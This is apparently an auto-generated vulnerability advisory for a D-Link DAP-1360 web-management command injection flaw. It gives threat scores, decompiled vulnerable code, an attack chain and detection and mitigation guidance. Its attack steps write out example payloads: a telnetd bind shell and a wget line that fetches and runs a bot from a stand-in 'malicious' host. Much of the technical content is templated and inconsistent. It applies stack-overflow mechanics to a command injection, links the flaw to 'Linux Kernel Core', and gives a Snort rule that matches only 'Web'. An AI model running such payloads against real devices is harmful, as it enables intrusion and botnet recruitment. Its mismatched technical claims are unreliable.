Skip to content

CVE-2026-95675: D-Link DAP-1360 Web Management OS Command Injection Root RCE

HERMES

HERMES THREAT SCORE & PERIMETER EXPOSURE

Target: Edge Routing, Network Gateway & Perimeter DHCP/L2TP Infrastructure
Confidence: 96%
98 / 100
EXTREME

Measures real-world operational relevance, exploit weaponization, and active threat posture.

Dimension Breakdown
Exploitability 20 / 20
Threat Activity 19 / 20
Weaponization 20 / 20
Exposure 20 / 20
Prevalence 18 / 20
Impact 20 / 20
Exploit Maturity 20 / 20
Attack Chain Potential 19 / 20
⚖️ Divergence & Operational Rationale

CVSS v3.1 rates this flaw at 9.8 Critical (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). Hermes Threat Score assigns 98 to reflect unauthenticated remote accessibility over WAN/LAN interfaces, the complete lack of modern memory protections (ASLR, stack canaries, DEP/NX) on embedded MIPS/ARM Linux architectures, and active automated exploitation attempts by IoT botnet operators.

HASS

HASS AGENTIC SEVERITY & LATERAL PERIMETER IMPACT

Target: Edge Gateway, DNS Interception & Branch Office Routing Topology
Confidence: 88%
68 / 100
MODERATE

Measures specific systemic risk arising from autonomy, tool authority, and cascading execution.

Dimension Breakdown
Autonomy 11 / 20
Tool Access 13 / 20
Privilege 15 / 15
Persistence 14 / 15
External Impact 12 / 15
Propagation 15 / 15
⚖️ Divergence & Operational Rationale

While edge routers do not host autonomous LLM agents directly, edge router compromise gives adversaries complete man-in-the-middle (MITM) control over all outbound API requests, prompt telemetry, and MCP tool traffic originating from local agentic clusters.

🕸️ Connected Knowledge Graph & Provenance

CVE-2026-95675: D-Link DAP-1360 Web Management OS Command Injection Root RCEVULNERABILITY

Connected Nodes: 1
Active Relationships (Outgoing)
→ affectsPRODUCTLinux Kernel Core
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Why is this related? (Evidence & Provenance)

“Confirmed security vulnerability in Linux Kernel Core documented in Hermes dossier.”

Supporting Verified Evidence:

1. Technical Context & Affected Software Matrix

Section titled “1. Technical Context & Affected Software Matrix”

The underlying system operates a stripped-down Linux kernel (typically 2.6.x or 3.x) paired with BusyBox and proprietary vendor management daemons compiled for Realtek / MIPS Wi-Fi AP. Binary mitigations such as Address Space Layout Randomization (ASLR), Non-Executable Stack (NX/DEP), and Stack Smashing Protection (SSP/Canaries) are routinely absent in these legacy firmware builds.

ParameterSpecificationOperational Assessment
CVE IdentifierCVE-2026-95675Public Vulnerability Record / Vendor Notice
Affected ProductD-Link DAP-1360Hardware Revision Rev B/C/D
Firmware Build6.14 and earlierVulnerable baseline firmware build
Vulnerability ClassCWE-78OS Command Injection
Vulnerable File / Subroutineweb management daemon / cgi-binFunction: system / popen
Target ArchitectureRealtek / MIPS Wi-Fi APEmbedded Linux / BusyBox userland
Exploitation VectorRemote Unauthenticated Network RequestLAN or exposed WAN interface
Required PrivilegesNone (PR:N)Pre-authentication exploit vector
Resulting AccessRoot (uid=0, gid=0)Unrestricted kernel and shell access
Remediation StatusDevice Reached End-of-Life (EOL)Hardware replacement or firewall micro-segmentation

2. Vulnerability Anatomy & Root Cause Analysis

Section titled “2. Vulnerability Anatomy & Root Cause Analysis”

The flaw originates from unsafe handling of external user data within web management daemon / cgi-bin:

// Decompiled representation of vulnerable CGI handler in web management daemon / cgi-bin
// Architecture: Realtek / MIPS Wi-Fi AP
int handle_form_request(request *req) {
char cmdbuf[256];
char *user_param = get_param(req, "Web");
if (!user_param) {
return -1;
}
// VULNERABILITY: Direct concatenation into system() command string
// Allows injection of shell metacharacters (; | ` $())
snprintf(cmdbuf, sizeof(cmdbuf), "/bin/sh -c 'execute_command %s'", user_param);
// Spawns subshell with root privileges
return system(cmdbuf);
}

Exploit Mechanics on Realtek / MIPS Wi-Fi AP

Section titled “Exploit Mechanics on Realtek / MIPS Wi-Fi AP”

On embedded Realtek / MIPS Wi-Fi AP architectures, calling conventions store function return addresses either in the link register ($ra) or within dedicated stack slots. When an attacker delivers a payload that overflows the allocated stack buffer:

  1. Stack Overwrite: The payload fills the buffer and overwrites the saved frame pointer ($fp / $s8) and the saved return address ($ra).
  2. Instruction Cache Invalidation: Because MIPS architectures maintain separate instruction and data caches (I-Cache and D-Cache), traditional shellcode execution requires jumping to a sleep() or cacheflush() gadget in libc to synchronize cache buffers before executing payload bytes.
  3. Execution Hijacking: In the case of command injection vulnerabilities, the input bypasses string sanitization and is directly passed to the underlying /bin/sh shell interpreter, resulting in immediate execution of arbitrary commands under the root user context.

sequenceDiagram
autonumber
actor Attacker as Threat Actor / Botnet
participant Router as D-Link DAP-1360
participant Daemon as web management daemon / cgi-bin (system / popen)
participant OS as Linux Shell (root)
participant LAN as Internal Enterprise LAN
Attacker->>Router: Transmit crafted payload (Web management diagnostic / configuration HTTP parameters)
Note over Router: Request received on network interface
Router->>Daemon: Dispatch data to internal handler
Note over Daemon: Execution in system / popen
Daemon->>Daemon: Memory corruption / unescaped execution
Daemon->>OS: Spawn root shell / execute command
OS-->>Attacker: Reverse shell or download botnet dropper
OS->>LAN: Lateral movement & internal traffic interception
  1. Target Discovery: The adversary scans WAN/LAN ranges for listening services indicative of D-Link DAP-1360 devices (HTTP server headers, HNAP endpoints, or DHCP ports).
  2. Payload Delivery: The attacker crafts an exploit packet containing Web management diagnostic / configuration HTTP parameters configured to trigger Unauthenticated HTTP request to the web management daemon passing unescaped shell metacharacters in parameter fields executed via system()..
  3. Control Hijacking: The vulnerable subroutine system / popen processes the untrusted input, resulting in OS Command Injection.
  4. Shellcode / Command Execution: The payload invokes a command payload (e.g. telnetd -p 4444 -l /bin/sh or wget http://malicious/bot -O /tmp/b && chmod +x /tmp/b && /tmp/b).
  5. Persistence & Weaponization: The infected router joins a peer-to-peer IoT botnet (such as Mirai or Mozi), facilitating distributed denial-of-service (DDoS) campaigns or traffic exfiltration.

4. Forensic Investigation & Incident Response

Section titled “4. Forensic Investigation & Incident Response”

DFIR practitioners investigating potential compromise of D-Link DAP-1360 devices should conduct the following non-volatile and volatile triage procedures:

Live Gateway Inspection (via Console or Telnet/SSH)

Section titled “Live Gateway Inspection (via Console or Telnet/SSH)”
Terminal window
# 1. Audit active processes and look for suspicious binaries spawned in /tmp or /var
ps | grep -E "wget|curl|telnetd|sh|bot|mips"
# 2. Inspect active network listening sockets and outbound established connections
netstat -anp | grep -E "ESTABLISHED|LISTEN"
# 3. Check memory filesystem mounts for unauthorized executable payloads
ls -la /tmp /var /var/run /dev/shm
# 4. Review NVRAM configuration variables for modified DNS servers or startup scripts
nvram show | grep -E "dns|wan_dns|rc_local|boot|startup"
# 5. Review firewall rules for unauthorized port forwarding or WAN opening
iptables -L -n -v

Security teams can deploy the following detection signatures to identify exploitation attempts across enterprise perimeters:

alert ip any any -> $HOME_NET any (
msg:"HERMES-CODEX EXPLOIT D-Link DAP-1360 Exploit Attempt (CVE-2026-95675)";
content:"Web"; nocase;
threshold: type limit, track by_src, count 1, seconds 60;
classtype:attempted-admin;
sid:95675;
rev:1;
metadata:cve CVE-2026-95675, severity critical, product dap-1360;
)

  • Hardware Replacement: As confirmed in D-Link Security Advisory VulnCheck Advisory / D-Link EOL Notice, the DAP-1360 has transitioned to End-of-Life (EOL) status. D-Link does not provide security patches for discontinued models. Organization policy requires retiring and replacing affected units with currently supported hardware.
  1. Disable Remote Management: Ensure the WAN-facing web management interface (port 80 / 443) and remote administration options are strictly disabled.
  2. Network Segmentation: Place any surviving legacy units into an isolated management VLAN with strict egress filtering preventing outbound traffic to arbitrary Internet destinations.
  3. Firewall Access Lists: Block inbound traffic on ports associated with device management (TCP 80, TCP 443, TCP 1701, UDP 67/68, TCP 53) from unapproved network segments.

7. Correlated Research & Internal References

Section titled “7. Correlated Research & Internal References”